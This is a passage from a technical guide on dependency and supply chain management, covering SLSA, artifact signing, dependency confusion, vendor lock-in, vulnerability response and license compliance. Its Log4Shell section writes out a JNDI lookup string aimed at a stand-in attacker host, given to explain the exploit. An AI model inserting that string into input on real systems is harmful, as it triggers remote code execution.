Dependency Review - Deep Water

Every modern software system is a careful balance of code you write and code you don’t. The dependencies you choose - libraries, services, platforms - determine your attack surface, your operational complexity, your legal exposure, and your ability to respond when things break. At this level, dependency management is about supply chain security, vendor negotiation, legal compliance, and architectural decisions that affect your company’s ability to operate.

The incidents that make headlines - Log4Shell, left-pad, SolarWinds - weren’t caused by theoretical vulnerabilities. They were dependency management failures that cascaded through thousands of organizations. Understanding why those incidents happened and how organizations responded teaches you what matters when managing complex dependency graphs.

Supply Chain Security Architecture

Supply chain attacks target the weakest link in software delivery: trust. You trust that the package you install from npm contains what the README says it does. You trust that the Docker base image doesn’t contain malware. You trust that your CI/CD system hasn’t been compromised. Attackers know this.

The SLSA Framework

Supply Level for Software Artifacts (SLSA, pronounced “salsa”) is a security framework from Google that defines levels of supply chain integrity. Most organizations operate at SLSA 0 (no guarantees) without realizing it.

SLSA Level 1 (Documentation):

Build process is fully scripted and automated
Provenance documents exist showing how artifacts were built
Someone can verify that the binary you’re running was built from specific source code

This sounds basic, but plenty of production systems fail here. Can you prove which commit produced your production deployment? Can you trace a deployed container back to the Dockerfile and base image versions?

SLSA Level 2 (Tamper Resistance):

Version control and build service authenticate
Provenance is generated by the build service, not user-controlled scripts
Tampering during the build process is detectable

GitHub Actions with provenance attestations gets you here. CircleCI and GitLab CI can too. The key is that the build metadata comes from the platform, not from scripts developers can modify.

SLSA Level 3 (Hardened Builds):

Source and build platform meet specific security standards
Provenance is non-falsifiable (cryptographically signed)
All artifacts are reproducible

Google’s internal infrastructure operates at SLSA 3. Most companies will struggle to achieve this without dedicated security engineering.

SLSA Level 4 (Maximum Security):

Two-person review required
Hermetic, reproducible builds
Dependencies are recursively audited

This is nation-state level security. Unless you’re building critical infrastructure or high-value targets, SLSA 3 is the realistic maximum.

For most organizations, getting to SLSA 2 prevents the majority of supply chain attacks. The jump from 0 to 2 is achievable with existing tools:

# .github/workflows/build.yml
name: Build with Provenance
on: [push]

permissions:
  contents: read
  packages: write
  id-token: write  # Required for provenance

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
      - run: npm ci
      - run: npm run build

      # Generate provenance attestation
      - uses: actions/attest-build-provenance@v1
        with:
          subject-path: 'dist/**'

This creates cryptographically signed provenance showing what source code and build process created your artifacts. Downstream consumers can verify the attestation before using your package.

Sigstore and Artifact Signing

Sigstore is an open source project that makes signing and verifying software artifacts as easy as installing a package. It includes:

Cosign: Sign and verify container images and other artifacts Fulcio: Certificate authority for code signing (no need to manage signing keys) Rekor: Transparency log for signatures (public record of what was signed when)

Here’s why this matters: traditionally, code signing required managing private keys. Keys get leaked, stolen, or lost. Developers forget to rotate them. They get committed to git repositories. It’s a mess.

Sigstore uses short-lived certificates tied to your OpenID Connect identity (GitHub, Google, Microsoft). Sign an artifact, the certificate expires after 10 minutes, and the signature is recorded in a public transparency log. No keys to manage, no secrets to leak.

Signing a container image:

# Sign with GitHub OIDC
cosign sign --yes ghcr.io/yourorg/yourapp:v1.2.3

# Verify the signature
cosign verify ghcr.io/yourorg/yourapp:v1.2.3 \
  --certificate-identity-regexp="https://github.com/yourorg/*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com"

Kubernetes can enforce signature verification:

# Verify images before deployment
apiVersion: v1
kind: Pod
metadata:
  name: app
spec:
  containers:
    - name: app
      image: ghcr.io/yourorg/yourapp:v1.2.3
  # Policy controller rejects unsigned images

Organizations adopting this can prevent the class of attacks where compromised CI/CD systems push malicious images. If the signature doesn’t verify against your organization’s identity, the deployment fails.

The practical implementation depends on your tolerance for complexity. Signing your published packages? Straightforward. Requiring signature verification across your entire dependency chain? That’s a multi-year effort requiring ecosystem cooperation.

Dependency Confusion and Typosquatting

Dependency confusion attacks exploit how package managers resolve names. You have an internal package called @yourcompany/authentication. An attacker publishes a public package with the same name and a higher version number. Your build system installs the malicious public package instead of your internal one.

This happened to major companies. Microsoft, Apple, PayPal, Netflix - all vulnerable before they patched their build systems. The attack worked because package managers defaulted to public registries even when private packages existed.

Prevention mechanisms:

Scope enforcement: Configure package managers to only fetch scoped packages from private registries.

// .npmrc
@yourcompany:registry=https://npm.yourcompany.com/
//npm.yourcompany.com/:_authToken=${NPM_TOKEN}

Allowlisting: Explicitly define which registries are allowed for which scopes.

# .yarnrc.yml
npmScopes:
  yourcompany:
    npmRegistryServer: "https://npm.yourcompany.com"
    npmAlwaysAuth: true

Registry mirroring: Run a proxy registry that only serves approved packages.

Tools like Sonatype Nexus, JFrog Artifactory, or Verdaccio act as intermediaries. Developers install from your registry, which proxies to npm/PyPI/Maven Central after applying your security policies.

Package name squatting: For internal package names you might use publicly, register placeholder packages on public registries. They don’t need to contain real code - just prevent attackers from claiming the name.

Typosquatting is similar but targets typos. The attacker registers reqeusts (a common typo of requests), hoping developers mistype the package name. Prevention is harder because you can’t predict all typos, but:

Use dependency lock files (package-lock.json, Pipfile.lock) so typos during updates don’t propagate
Enable installation approval flows for new dependencies
Run automated scans looking for suspicious new dependencies (packages installed once, never updated)

Vendor Takeover and Ownership Changes

A maintainer’s npm account gets compromised. A popular package gets sold to a new owner who introduces analytics tracking. A company acquires a library and changes the license. The risk isn’t theoretical.

Event-stream incident (2018): A popular npm package (event-stream, 2 million downloads/week) transferred ownership to a new maintainer who published a version containing malicious code targeting cryptocurrency wallets. The malicious version was available for two months before discovery.

ua-parser-js incident (2021): Three malicious versions of ua-parser-js (8 million downloads/week) were published after the maintainer’s account was compromised. The malicious code attempted to install cryptominers and credential stealers.

Defense strategies:

Lock files and hash verification: package-lock.json and similar files record exact versions and integrity hashes. If the package contents change, installation fails.

{
  "packages": {
    "node_modules/lodash": {
      "version": "4.17.21",
      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
      "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg=="
    }
  }
}

Automated security monitoring: Tools like Socket.dev analyze package updates for suspicious behavior:
- New network connections in patch versions
- Obfuscated code in updates
- Installation scripts that weren’t there before
- Dependency additions in minor versions
Pinning critical dependencies: Use exact versions for security-critical packages. Accept the maintenance burden in exchange for control over when updates happen.

{
  "dependencies": {
    "express": "4.18.2",      // Exact version
    "helmet": "~7.1.0",       // Patch updates only
    "lodash": "^4.17.21"      // Minor + patch updates
  }
}

The tradeoff is that you’re responsible for monitoring and updating. Dependabot helps, but you’re choosing manual updates over automatic security patches.

Software Bill of Materials (SBOM): Generate a complete inventory of components, versions, and hashes. This is your evidence trail when investigating incidents.

# Generate SBOM in SPDX format
syft packages dir:. -o spdx-json > sbom.json

# Or CycloneDX format
cyclonedx-cli generate -o sbom-cyclonedx.json

SBOMs are becoming mandatory for government contractors (US Executive Order 14028) and will likely spread to regulated industries. Even without regulatory requirements, you want this data when investigating supply chain incidents.

Vendor Lock-In: Strategic Analysis

Vendor lock-in isn’t inherently bad. AWS lock-in might be acceptable if you’re getting significant value from AWS-specific services. The problem is accidental lock-in - when you’re deeply coupled to a vendor without having consciously accepted the trade-off.

Multi-Cloud Abstraction Strategies

Multi-cloud is expensive and complex. Organizations pursuing it usually have one of these motivations:

Regulatory requirements: Data residency laws force geographic distribution
Risk mitigation: Avoiding single vendor dependency for critical systems
Cost optimization: Using cheapest provider for each workload
Merger integration: Combining organizations with different cloud choices

If none of those apply, multi-cloud probably isn’t worth the complexity. That said, you can design for portability without running multiple clouds in production.

Abstraction layer patterns:

Storage abstraction example:

// Define interface independent of provider
interface ObjectStorage {
  upload(key: string, data: Buffer, metadata?: Record<string, string>): Promise<void>;
  download(key: string): Promise<Buffer>;
  delete(key: string): Promise<void>;
  listObjects(prefix: string): Promise<string[]>;
}

// AWS implementation
class S3Storage implements ObjectStorage {
  constructor(private s3Client: S3Client, private bucket: string) {}

  async upload(key: string, data: Buffer, metadata?: Record<string, string>) {
    await this.s3Client.send(new PutObjectCommand({
      Bucket: this.bucket,
      Key: key,
      Body: data,
      Metadata: metadata
    }));
  }

  // ... other methods
}

// GCP implementation
class GCSStorage implements ObjectStorage {
  constructor(private storage: Storage, private bucket: string) {}

  async upload(key: string, data: Buffer, metadata?: Record<string, string>) {
    const file = this.storage.bucket(this.bucket).file(key);
    await file.save(data, { metadata });
  }

  // ... other methods
}

// Application code uses the interface
class DocumentService {
  constructor(private storage: ObjectStorage) {}

  async saveDocument(id: string, content: Buffer) {
    await this.storage.upload(`documents/${id}`, content);
  }
}

This looks good in slides. Reality is messier:

S3 has features GCS doesn’t (object locking, Glacier storage classes)
GCS has features S3 doesn’t (uniform bucket-level access)
Performance characteristics differ (latency, throughput, consistency guarantees)
Pricing models differ (per-request costs, egress charges)

Your abstraction either hides useful features (limiting what you can do) or leaks implementation details (defeating the purpose). There’s no perfect answer. The question is what level of portability justifies the abstraction cost.

When abstraction makes sense:

You’re using commodity features (basic object storage, key-value cache, relational database)
The performance differences don’t matter for your use case
You need to support multiple providers for regulatory or business reasons
You’re building a product that customers deploy on their chosen infrastructure

When to accept vendor lock-in:

You’re using provider-specific features that differentiate your product (AWS Lambda layers, GCP BigQuery, Azure Cognitive Services)
The provider’s managed service is significantly better than open source alternatives
Your team’s expertise is concentrated in one ecosystem
The business risk of vendor dependency is lower than the technical risk of managing complexity

Database Portability Strategies

Database choice is one of the hardest to reverse. Your schema, queries, performance characteristics, and operational tooling all couple to the database.

Portability spectrum (most to least portable):

PostgreSQL/MySQL: Open source, widely supported, mature ecosystem. Can run on any cloud, on-premises, or managed services. Migration between providers (AWS RDS → GCP Cloud SQL → self-hosted) is mostly operational, not architectural.
Open source databases with vendor extensions: PostgreSQL with AWS Aurora features, MySQL with Google Cloud SQL enhancements. Mostly portable but you lose features when migrating.
Proprietary databases with standard interfaces: SQL Server, Oracle. Expensive to migrate but at least use SQL standards. Schema portability exists but vendor-specific features (T-SQL, PL/SQL) create friction.
Cloud-native databases: DynamoDB, Firestore, CosmosDB. Deeply integrated with their platforms. Migration requires application rewrites, not just operational changes.

Making the decision:

If you’re building a startup, PostgreSQL gives you an exit strategy. You can start on Heroku Postgres, move to AWS RDS, migrate to self-hosted if costs get prohibitive. The lock-in is minimal.

If you’re building at scale where DynamoDB’s single-digit millisecond latency matters, the performance benefit might justify the lock-in. Just acknowledge that you’re accepting it.

Repository pattern for database abstraction:

// Domain model (independent of database)
interface UserRepository {
  findById(id: string): Promise<User | null>;
  findByEmail(email: string): Promise<User | null>;
  save(user: User): Promise<void>;
  delete(id: string): Promise<void>;
}

// PostgreSQL implementation
class PostgresUserRepository implements UserRepository {
  constructor(private db: Pool) {}

  async findById(id: string): Promise<User | null> {
    const result = await this.db.query(
      'SELECT * FROM users WHERE id = $1',
      [id]
    );
    return result.rows[0] ? this.mapToUser(result.rows[0]) : null;
  }

  // ... other methods
}

// DynamoDB implementation
class DynamoDBUserRepository implements UserRepository {
  constructor(private dynamodb: DynamoDBClient, private table: string) {}

  async findById(id: string): Promise<User | null> {
    const result = await this.dynamodb.send(new GetItemCommand({
      TableName: this.table,
      Key: { id: { S: id } }
    }));
    return result.Item ? this.mapToUser(result.Item) : null;
  }

  // ... other methods
}

This works for simple CRUD operations. It breaks down when you need:

Complex queries (joins, aggregations)
Transactions across multiple entities
Database-specific optimizations (PostgreSQL window functions, DynamoDB composite indexes)

The abstraction is helpful for isolating database dependencies, but it won’t make migration trivial.

Platform-Specific Features: Use Them or Avoid Them?

Every cloud platform has features that make development easier but increase lock-in. The question is whether the productivity gain justifies the coupling.

Examples of high-lock-in features:

AWS Lambda layers, Step Functions, EventBridge
GCP Cloud Run, Workflows, Pub/Sub
Azure Functions, Logic Apps, Service Bus

Evaluating the trade-off:

Ask: “What would migration cost if we needed to leave this platform?”

For AWS Lambda:

Functions → Containers: Straightforward, mostly refactoring
Step Functions → Temporal/Cadence: Significant rewrite, different programming model
EventBridge → RabbitMQ/Kafka: Architectural changes, event routing logic moves to application

If Step Functions saves you from building a state machine orchestration system, the lock-in might be worth it. You’re trading optionality for velocity.

If you’re in a regulated industry where vendor independence is a compliance requirement, you can’t make that trade.

Escape hatch strategy:

Design systems where the core business logic is portable and the platform-specific code is minimal:

// Core business logic (portable)
class OrderProcessor {
  async processOrder(order: Order): Promise<ProcessingResult> {
    // Business logic independent of where it runs
    const validation = await this.validateOrder(order);
    if (!validation.isValid) {
      return { status: 'rejected', reason: validation.reason };
    }

    const payment = await this.processPayment(order);
    if (!payment.success) {
      return { status: 'failed', reason: payment.error };
    }

    await this.fulfillOrder(order);
    return { status: 'completed' };
  }
}

// AWS Lambda wrapper (platform-specific, minimal)
export const handler: Handler = async (event: SQSEvent) => {
  const processor = new OrderProcessor(/* dependencies */);

  for (const record of event.Records) {
    const order = JSON.parse(record.body);
    await processor.processOrder(order);
  }
};

// GCP Cloud Run wrapper (different platform, same logic)
app.post('/process-order', async (req, res) => {
  const processor = new OrderProcessor(/* dependencies */);
  const result = await processor.processOrder(req.body);
  res.json(result);
});

The business logic is tested and portable. The platform-specific code is a thin adapter. Migration means rewriting the adapters, not the core system.

Dependency Abstraction Patterns

Isolating dependencies through architectural patterns reduces coupling and makes systems easier to modify.

Adapter Pattern for External Services

The adapter pattern wraps third-party services with your own interface. The rest of your code depends on your interface, not the vendor’s API.

Payment processing abstraction:

// Your interface
interface PaymentProcessor {
  createCustomer(email: string, name: string): Promise<Customer>;
  createPaymentMethod(customerId: string, token: string): Promise<PaymentMethod>;
  chargeCustomer(customerId: string, amount: number, currency: string): Promise<Charge>;
}

// Stripe adapter
class StripePaymentProcessor implements PaymentProcessor {
  constructor(private stripe: Stripe) {}

  async createCustomer(email: string, name: string): Promise<Customer> {
    const stripeCustomer = await this.stripe.customers.create({ email, name });
    return {
      id: stripeCustomer.id,
      email: stripeCustomer.email!,
      name: stripeCustomer.name!
    };
  }

  async chargeCustomer(customerId: string, amount: number, currency: string): Promise<Charge> {
    const paymentIntent = await this.stripe.paymentIntents.create({
      customer: customerId,
      amount,
      currency,
      confirm: true
    });

    return {
      id: paymentIntent.id,
      amount: paymentIntent.amount,
      status: this.mapStatus(paymentIntent.status)
    };
  }

  private mapStatus(stripeStatus: string): ChargeStatus {
    // Translate Stripe's status to your domain model
    switch (stripeStatus) {
      case 'succeeded': return 'completed';
      case 'processing': return 'pending';
      case 'requires_payment_method': return 'failed';
      default: return 'unknown';
    }
  }
}

// PayPal adapter (different API, same interface)
class PayPalPaymentProcessor implements PaymentProcessor {
  // Implementation using PayPal SDK
}

Benefits:

Business logic doesn’t import Stripe or PayPal SDKs
Switching providers means writing a new adapter, not changing business logic
Testing is easier (mock your interface, not Stripe’s)
You control the vocabulary (your domain language, not Stripe’s)

Costs:

Adapter code to write and maintain
Impedance mismatch when provider features don’t map cleanly
Performance overhead (usually negligible)

This is worth it for critical dependencies where you want the option to switch or where business logic shouldn’t couple to vendor specifics.

Anti-Corruption Layer

The anti-corruption layer (from Domain-Driven Design) is a sophisticated adapter that protects your domain model from external systems with incompatible models.

Example: integrating with a legacy ERP system that models inventory in a way that doesn’t match your e-commerce domain.

// Your domain model
class Product {
  constructor(
    public id: string,
    public name: string,
    public price: Money,
    public stock: StockLevel
  ) {}

  canFulfillOrder(quantity: number): boolean {
    return this.stock.available >= quantity;
  }
}

// Legacy ERP has a different model
interface ERPInventoryRecord {
  itemCode: string;
  description: string;
  unitPrice: number;
  warehouseQuantities: Array<{
    location: string;
    onHand: number;
    allocated: number;
    onOrder: number;
  }>;
}

// Anti-corruption layer translates between models
class ERPInventoryAdapter {
  constructor(private erpClient: ERPClient) {}

  async getProduct(id: string): Promise<Product> {
    const erpRecord = await this.erpClient.getInventoryRecord(id);

    // Complex translation logic
    const totalAvailable = erpRecord.warehouseQuantities.reduce(
      (sum, wh) => sum + (wh.onHand - wh.allocated),
      0
    );

    return new Product(
      erpRecord.itemCode,
      this.cleanupDescription(erpRecord.description),
      new Money(erpRecord.unitPrice, 'USD'),
      new StockLevel(totalAvailable)
    );
  }

  private cleanupDescription(desc: string): string {
    // ERP descriptions have legacy formatting quirks
    return desc.replace(/\[LEGACY\]/g, '').trim();
  }
}

The anti-corruption layer prevents the legacy system’s modeling decisions from polluting your codebase. Your domain stays clean even when integrating with systems that have different vocabularies, different assumptions, or different quality standards.

Interface Segregation for Dependencies

Don’t depend on entire libraries when you only need a small piece. Define minimal interfaces that capture what you actually use.

// Bad: depending on entire AWS SDK
import { S3Client, PutObjectCommand, GetObjectCommand } from '@aws-sdk/client-s3';

class DocumentStorage {
  constructor(private s3: S3Client, private bucket: string) {}
  // Everything couples to AWS
}

// Better: define what you actually need
interface BlobStorage {
  put(key: string, data: Buffer): Promise<void>;
  get(key: string): Promise<Buffer>;
}

// AWS implementation
class S3BlobStorage implements BlobStorage {
  constructor(private s3: S3Client, private bucket: string) {}

  async put(key: string, data: Buffer): Promise<void> {
    await this.s3.send(new PutObjectCommand({
      Bucket: this.bucket,
      Key: key,
      Body: data
    }));
  }

  async get(key: string): Promise<Buffer> {
    const response = await this.s3.send(new GetObjectCommand({
      Bucket: this.bucket,
      Key: key
    }));
    return Buffer.from(await response.Body!.transformToByteArray());
  }
}

// Application code
class DocumentStorage {
  constructor(private storage: BlobStorage) {}
  // Only couples to minimal interface
}

Testing becomes straightforward:

// Mock implementation for tests
class InMemoryBlobStorage implements BlobStorage {
  private data = new Map<string, Buffer>();

  async put(key: string, data: Buffer): Promise<void> {
    this.data.set(key, data);
  }

  async get(key: string): Promise<Buffer> {
    const data = this.data.get(key);
    if (!data) throw new Error('Not found');
    return data;
  }
}

// Test without AWS
test('document storage saves files', async () => {
  const storage = new DocumentStorage(new InMemoryBlobStorage());
  await storage.save('doc.pdf', Buffer.from('content'));
  // assertions
});

The pattern scales. Define interfaces for email sending, SMS delivery, payment processing, authentication - any external dependency you might want to replace or test without the real service.

Vulnerability Management at Scale

Managing vulnerabilities across hundreds of dependencies and multiple services requires systematic processes, not ad-hoc responses.

CVE Lifecycle and Response Planning

When a CVE is published for a dependency you use, you need a decision framework:

Severity assessment:

CVSS scores (0-10) give you a starting point, but you need context:

Critical (9.0-10.0): Remote code execution, authentication bypass, data exposure with no user interaction
High (7.0-8.9): Privilege escalation, SQL injection, XSS with serious impact
Medium (4.0-6.9): Information disclosure, DoS requiring specific conditions
Low (0.1-3.9): Minor information leaks, DoS requiring local access

Exploitability factors:

Is exploit code publicly available? (Prioritize)
Does it require authentication? (Less urgent if authentication is strong)
Is the vulnerable code path actually used in your application? (Audit call graphs)
Are there mitigating controls? (WAF rules, network segmentation)

Response timeline framework:

Critical + Public Exploit + Unauthenticated:
  - Assess impact: 1 hour
  - Deploy mitigation: 4 hours
  - Full remediation: 24 hours

Critical + No Exploit + Requires Auth:
  - Assess impact: 4 hours
  - Plan remediation: 24 hours
  - Deploy fix: 1 week

High + Public Exploit:
  - Assess impact: 24 hours
  - Deploy mitigation: 1 week
  - Full remediation: 2 weeks

Medium:
  - Assess impact: 1 week
  - Deploy fix: Next sprint

Low:
  - Review quarterly
  - Fix during regular updates

Adjust these based on your risk tolerance and regulatory requirements. Healthcare and finance typically have shorter windows. Internal tools might have longer ones.

Patch Management Strategy

Patching dependencies is risk management. You’re balancing the risk of known vulnerabilities against the risk of updates breaking your system.

Automated patch tiers:

Tier 1 - Auto-merge:

Patch version updates (1.2.3 → 1.2.4)
Low/medium severity fixes
Passing CI tests
Libraries with good track records

Configuration example with Dependabot:

# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    open-pull-requests-limit: 10

    # Auto-merge patch updates
    versioning-strategy: increase
    labels:
      - "dependencies"
      - "automerge"

    # Group minor updates for review
    groups:
      minor-updates:
        patterns:
          - "*"
        update-types:
          - "minor"

GitHub Actions can auto-merge PRs with specific labels:

name: Auto-merge Dependabot
on: pull_request

jobs:
  automerge:
    runs-on: ubuntu-latest
    if: github.actor == 'dependabot[bot]'
    steps:
      - uses: actions/checkout@v4
      - name: Check if automerge label exists
        id: check-label
        run: |
          if [[ $(gh pr view ${{ github.event.pull_request.number }} --json labels -q '.labels[].name' | grep automerge) ]]; then
            echo "automerge=true" >> $GITHUB_OUTPUT
          fi
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Auto-merge
        if: steps.check-label.outputs.automerge == 'true'
        run: gh pr merge ${{ github.event.pull_request.number }} --auto --squash
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

Tier 2 - Automated testing, manual review:

Minor version updates (1.2.3 → 1.3.0)
New features or API changes
High severity security fixes

CI runs full test suite, security scans, and integration tests. Developers review changelog and approve.

Tier 3 - Manual testing:

Major version updates (1.x.x → 2.0.0)
Breaking changes
Critical dependencies (auth, payment, database)

Requires staging environment testing, rollback plan, and phased rollout.

Zero-Day Response Procedures

Zero-day vulnerabilities (exploits before patches exist) require temporary mitigations while waiting for fixes.

Log4Shell example (December 2021):

The vulnerability: Log4j would evaluate JNDI expressions in log messages, allowing remote code execution. An attacker could trigger it by getting ${jndi:ldap://attacker.com/exploit} logged anywhere.

Timeline and response:

Day 0 (CVE published): No patch available. Organizations scrambled to identify Log4j usage.
Immediate mitigation: Set environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true to disable feature.
Day 1: Log4j 2.15.0 released. Organizations began urgent patching.
Day 4: 2.15.0 found incomplete. CVE-2021-45046 published.
Day 6: Log4j 2.16.0 released with full fix.
Day 9: Third vulnerability (CVE-2021-45105) published.
Day 11: Log4j 2.17.0 released.

Organizations that responded well had:

Asset inventory: Knew where Log4j was used (direct dependencies, transitive dependencies, embedded in third-party software).

# Find Log4j in Java dependencies
mvn dependency:tree | grep log4j

# Find in container images
syft packages alpine:latest | grep log4j

# Find in running systems
find / -name "log4j-core-*.jar" 2>/dev/null

Quick mitigation deployment: Could push environment variable changes without full redeployment.
Patch testing process: Could validate patches quickly and deploy to production within hours.
Communication plan: Updated customers and stakeholders on status and remediation timeline.

Organizations that struggled:

Didn’t know what dependencies they had
Couldn’t deploy configuration changes quickly
Required lengthy change approval processes
Had no emergency patch procedures

Building zero-day response capabilities:

Maintain SBOM for all systems (you need to know what you’re running)
Practice emergency patch drills (can you patch critical systems in 24 hours?)
Have emergency change approval process (not 3-week CAB review)
Monitor security mailing lists and vulnerability databases
Establish communication templates for customer notification

Security Advisory Monitoring

You can’t respond to vulnerabilities you don’t know about. Monitoring must be automated and comprehensive.

Information sources:

GitHub Advisory Database: Covers npm, PyPI, RubyGems, Maven, NuGet
NVD (National Vulnerability Database): CVEs across all software
Vendor security bulletins: AWS Security Bulletins, GCP Security Bulletins, etc.
Package ecosystem advisories: npm advisories, PyPI vulnerabilities
Mailing lists: oss-security, vendor-specific lists

Automated monitoring setup:

# GitHub Advisory Database via GraphQL
query {
  securityVulnerabilities(first: 10, ecosystem: NPM, package: "express") {
    nodes {
      advisory {
        summary
        severity
        publishedAt
      }
      vulnerableVersionRange
      firstPatchedVersion {
        identifier
      }
    }
  }
}

Tools like Snyk, Socket, and GitHub Dependabot automate this monitoring and create actionable pull requests.

Alert fatigue prevention:

You’ll get many vulnerability notifications. Most won’t be critical. Filtering reduces noise:

Suppress low severity in non-critical systems
Require exploitability analysis for medium severity
Immediate alerts for critical/high in production dependencies
Weekly digests for development dependencies

Example notification policy:

{
  "production_dependencies": {
    "critical": "immediate_page",
    "high": "immediate_slack",
    "medium": "daily_email",
    "low": "weekly_digest"
  },
  "dev_dependencies": {
    "critical": "immediate_slack",
    "high": "daily_email",
    "medium": "weekly_digest",
    "low": "suppress"
  }
}

The goal is to ensure critical alerts get immediate attention without drowning teams in noise.

License Compliance and Legal Risk

Software licenses are contracts. Violating them exposes your organization to legal liability, forced code disclosure, and financial penalties.

Copyleft vs Permissive Licenses

Permissive licenses (MIT, Apache 2.0, BSD):

Use in commercial software
Modify the code
Distribute as open source or proprietary
Requirements: preserve copyright notices, include license text

These are safe for commercial use with minimal restrictions.

Copyleft licenses (GPL, AGPL, LGPL):

Use in your software
Modify the code
Distribute - BUT you must provide source code under the same license
Strong copyleft (GPL, AGPL): Your entire application becomes GPL
Weak copyleft (LGPL, MPL): Only modifications to the library must be released

GPL implications for commercial software:

If you use a GPL library and distribute your software, you must:

Provide source code to recipients
License your code under GPL
Allow recipients to modify and redistribute

This is incompatible with proprietary software models. You can use GPL software internally (not distribution), but not in products you sell or provide as SaaS.

AGPL is stricter: If you use AGPL code in a network service (SaaS), users accessing your service over a network count as recipients. You must provide source code even though you’re not distributing binaries.

MongoDB switched from AGPL to Server Side Public License (SSPL) to prevent cloud providers from offering managed MongoDB without contributing back. Elastic did similar with Elasticsearch. These licenses are not OSI-approved and have unclear legal status.

License Compatibility

Some licenses don’t mix well:

GPL + MIT: Compatible. GPL is stronger, final distribution is GPL.

Apache 2.0 + GPL v2: Incompatible. Apache 2.0 has patent grant provisions GPL v2 doesn’t. Use GPL v3 instead.

Multiple GPL versions: GPL v2 “only” and GPL v3 are incompatible unless GPL v2 code specifies “v2 or later.”

Proprietary + GPL: Incompatible unless you’re not distributing.

License compatibility matrices exist, but the safest approach for commercial software is to avoid copyleft licenses entirely.

License Scanning Automation

Manual license review doesn’t scale. Automated scanning catches violations before they reach production.

FOSSA (commercial):

Scans codebases for dependencies and licenses
Checks for license conflicts
Generates compliance reports
Integrates with CI/CD to block non-compliant PRs

# .fossa.yml
version: 3
targets:
  only:
    - type: npm
policy:
  deny:
    - GPL-2.0
    - GPL-3.0
    - AGPL-3.0
  warn:
    - LGPL-2.1
    - LGPL-3.0

license-checker (open source, npm):

npx license-checker --summary

# Fail CI if GPL found
npx license-checker --failOn "GPL"

syft + grype (open source, multi-language):

# Generate SBOM with licenses
syft packages dir:. -o json > sbom.json

# Check for forbidden licenses
cat sbom.json | jq '.artifacts[] | select(.licenses[].value | contains("GPL"))'

Integration with CI prevents violations:

# GitHub Actions
- name: License scan
  run: |
    npm install -g license-checker
    license-checker --failOn "GPL;AGPL;SSPL"

Legal Review Process

Before launch, legal review should cover:

1. Dependency inventory: Complete list with versions and licenses 2. License analysis: Identification of copyleft, commercial, or custom licenses 3. Attribution compliance: Proper copyright notices included 4. Distribution method: Clarify whether you’re distributing software or providing SaaS 5. Source code disclosure obligations: What must be disclosed under copyleft licenses 6. Patent grants: Understanding patent license provisions (Apache 2.0, GPL v3) 7. Commercial dependency terms: Review SLAs, usage limits, indemnification clauses

SBOM generation for legal review:

# CycloneDX format (industry standard)
cyclonedx-cli generate -o legal-review-sbom.xml

# SPDX format (Linux Foundation standard)
syft packages -o spdx-json > legal-review-sbom.json

Provide this to legal counsel along with:

Description of how each dependency is used
Whether dependencies are modified
Distribution model (binary distribution, SaaS, internal use only)

Open source compliance policies:

Many organizations maintain approved/denied license lists:

Approved for any use:

MIT
Apache 2.0
BSD (2-clause, 3-clause)
ISC

Approved with review:

LGPL 2.1, 3.0 (for dynamic linking only)
MPL 2.0 (for unmodified libraries)

Prohibited:

GPL 2.0, 3.0
AGPL 3.0
SSPL
Commons Clause
Any “source available” non-OSI licenses

Having clear policies prevents developers from accidentally introducing problematic licenses.

Monorepo Dependency Management

Monorepos (single repository containing multiple projects) create unique dependency management challenges.

Internal Dependency Graphs

In a monorepo, projects depend on each other. Changes to shared libraries affect downstream consumers.

Example structure:

monorepo/
├── packages/
│   ├── core/           # Shared utilities
│   ├── auth/           # Authentication library (depends on core)
│   ├── api/            # API service (depends on auth, core)
│   ├── web/            # Web app (depends on api, auth, core)
│   └── mobile/         # Mobile app (depends on api, auth, core)

Dependency management strategies:

1. Workspace dependencies (npm/yarn/pnpm workspaces):

// packages/api/package.json
{
  "dependencies": {
    "@company/core": "workspace:*",
    "@company/auth": "workspace:*"
  }
}

Workspaces link local packages during development. Changes to @company/core are immediately available to api without publishing.

2. Version pinning vs version ranges:

Pinned versions: All packages use exact versions of internal dependencies.

{
  "dependencies": {
    "@company/core": "1.2.3"
  }
}

Pros: Explicit, predictable, easier to reason about changes Cons: Requires version bumps across packages for every change

Version ranges: Packages specify compatible versions.

{
  "dependencies": {
    "@company/core": "^1.2.0"
  }
}

Pros: Automatic updates within range, less version churn Cons: Can introduce unexpected behavior if ranges overlap multiple breaking changes

Most monorepos use workspace protocol during development and publish with exact versions.

3. Circular dependency detection:

# Using madge
npx madge --circular packages/*/src

# Using dependency-cruiser
npx depcruise --validate .dependency-cruiser.js packages

Circular dependencies indicate architectural problems. Resolve by extracting shared code or inverting dependencies.

Build Orchestration and Caching

When core changes, you need to rebuild everything that depends on it - but only those things.

Tools for monorepo builds:

Turborepo:

// turbo.json
{
  "pipeline": {
    "build": {
      "dependsOn": ["^build"],
      "outputs": ["dist/**"]
    },
    "test": {
      "dependsOn": ["build"],
      "outputs": []
    }
  }
}

Running turbo run build builds packages in dependency order, caching results. If core hasn’t changed, it uses cached build. If core changed, it rebuilds core and everything depending on it.

Nx:

# Build only affected packages
nx affected:build --base=main

# Test only affected packages
nx affected:test --base=main

Nx analyzes git diffs to determine what changed and only rebuilds/tests affected packages.

Bazel (Google’s build system):

Extremely sophisticated with hermetic builds and remote caching. Used by Google, Uber, and others at massive scale. High complexity cost - worth it at Google scale, overkill for most teams.

Internal Package Publishing

Should you publish internal packages to a registry, or only use workspace links?

Workspace-only approach:

All packages always use local versions
Simple mental model
Requires monorepo access to consume packages

Registry publishing approach:

Packages published to private registry (npm, Artifactory)
Other teams/projects can depend on packages without monorepo access
Versioning communicates API stability

Hybrid approach (common):

Development uses workspace links
CI publishes to registry
External consumers use registry
Internal consumers use workspace

Automation example:

# GitHub Actions
- name: Publish changed packages
  run: |
    npx lerna publish --yes --conventional-commits
  env:
